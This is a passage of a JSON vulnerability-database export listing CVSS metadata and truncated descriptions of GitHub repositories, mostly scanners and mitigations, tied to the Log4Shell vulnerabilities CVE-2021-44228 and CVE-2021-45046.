"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T07:51:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-16T11:59:53", "id": "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-17T03:43:41", "description": "# nginx-mitigate-log4shell\nMitigate log4shell (CVE-2021-44228 an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T13:45:08", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-03-17T03:09:03", "id": "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T02:48:20", "description": "<h1 align=\"center\">log4j-scan</h1>\n<h4 align=\"center\">A fully au...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T03:57:50", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-03T22:05:19", "id": "00264586-32AF-5469-819B-90FBDA0B6FF2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T20:08:09", "description": "# log4shell\nPython Script to scan the server file system for log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T17:22:17", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-16T19:22:07", "id": "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-31T08:11:19", "description": "# log4j-samples\nSamples of log4j library versions to help log4j ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T18:12:29", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-31T03:02:07", "id": "6413E08F-7E60-50ED-932E-527F515A6C19", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T17:58:26", "description": "<h1 align=\"center\">log4shell</h1>\n<h4 align=\"center\">A fully aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T09:15:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-18T12:16:58", "id": "57742B88-2AA6-5788-825F-92A73CA85718", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-03T20:46:55", "description": "# CVE-2021-44228_scanner\nApplications that are vulnerable to the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T23:33:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-03T08:58:54", "id": "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-14T12:53:08", "description": "## CVE-2021-44228: Log4j / Log4Shell Security Research Summary\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:34:54", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-02-14T10:38:08", "id": "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-12T09:05:45", "description": "# Log4j-JNDIServer\n\nThis project will help to test the Log4j CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T20:07:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-02-12T08:17:39", "id": "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-14T02:32:45", "description": "# PowerShell-Log4J-Scanner\ncan find, analyse and...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T00:51:46", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-31T13:32:41", "id": "E1ABFD41-98C8-576F-8509-5541B40FD442", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-19T08:08:13", "description": "# inspec-log4j\n\nThis profile scans for vulnerable versions of Lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T04:04:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-19T05:29:36", "id": "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-19T20:08:00", "description": "# Log4J Patched Dependency for Log4Shell\n\nThis repository aims t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T16:26:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-19T18:29:10", "id": "231364E1-A2B1-558A-B805-F242AA97B13F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-04T20:10:16", "description": "\ufeff# log4jjndilookupremove\r\n A simple script to remove Log4J JndiL...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:59:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-01-04T14:24:23", "id": "743571E7-B8EE-5E77-B047-E2E001379ACE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:10:40", "description": "# Detecting CVE-2021-44228 and CVE-2021-450...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T21:57:58", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-17T14:19:20", "id": "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:29:45", "description": "log4j RCE (CVE-2021-44228)\uc774 2.15\uc5d0\uc11c \ud328\uce58\ub418\uc5c8\uc9c0\ub9cc, CVE-2021-45046 (DoS \uc720...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T11:43:56", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-18T11:53:15", "id": "0D243A34-B42E-5007-90D0-A30ECABDA204", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T21:01:40", "description": "# horrors-log4shell\n\n> A micro lab (playground?) for CVE-2021-44...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:44:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-15T19:14:39", "id": "21AACF78-8053-529E-909E-B6D5158008AC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:12:20", "description": "# CVE-2021-44228_scanner\nApplications that are vulnerable to the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T08:32:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-17T08:32:31", "id": "00423BD1-64DA-5DB0-848E-1BACC0883E15", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-08T20:33:03", "description": "# Log4j-HammerTime\nThis Burp Suite Active Scanner extension vali...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T13:25:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-01-08T17:32:58", "id": "D72095BC-06C5-50B2-8F66-EC86811783D3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-19T17:07:52", "description": "<h1 align=\"center\">log4j-scan</h1>\n<h4 align=\"center\">A fully au...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T14:20:54", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-19T14:23:40", "id": "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-24T23:28:04", "description": "<h1 align=\"center\">log4j-scan</h1>\n<h4 align=\"center\">A fully au...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T13:49:14", "type": "githubexploit", "title": "Exploit for 